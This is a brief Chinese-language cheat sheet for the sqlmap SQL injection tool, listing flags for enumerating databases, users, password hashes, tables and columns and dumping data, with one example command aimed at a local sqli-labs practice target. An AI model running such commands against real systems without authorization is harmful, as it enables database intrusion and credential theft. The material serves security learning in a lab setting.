sqlmap简介:
sqlmap是一个自动化sql注入工具,主要功能是发现并且利用给定URL进行SQL注入。
sqlmap常用参数:
-u "注入url" #指定url
-m 文件名 #获取多个url
-r 文件名 #从文件中获取http请求
-l 文件名 #从日志文件中获取目标
--users # 获取数据库用户
--passwords #获取数据库用户密码
--current-user #获取当前数据库用户名称
--cookie “” #设置cookie
--data #设置post请求参数
-p
--dbs #获取数据库
从sqli/less-1获取到的服务器数据库列表。
-D 数据库 #指定数据库
--tables # 获取表
sqlmap -u http://192.168.1.121/sqli/less-1/?id=1 -D security --tables
-T 表名 #指定表
--columns #获取字段名
-C 字段 #获取列名
--dump #获取数据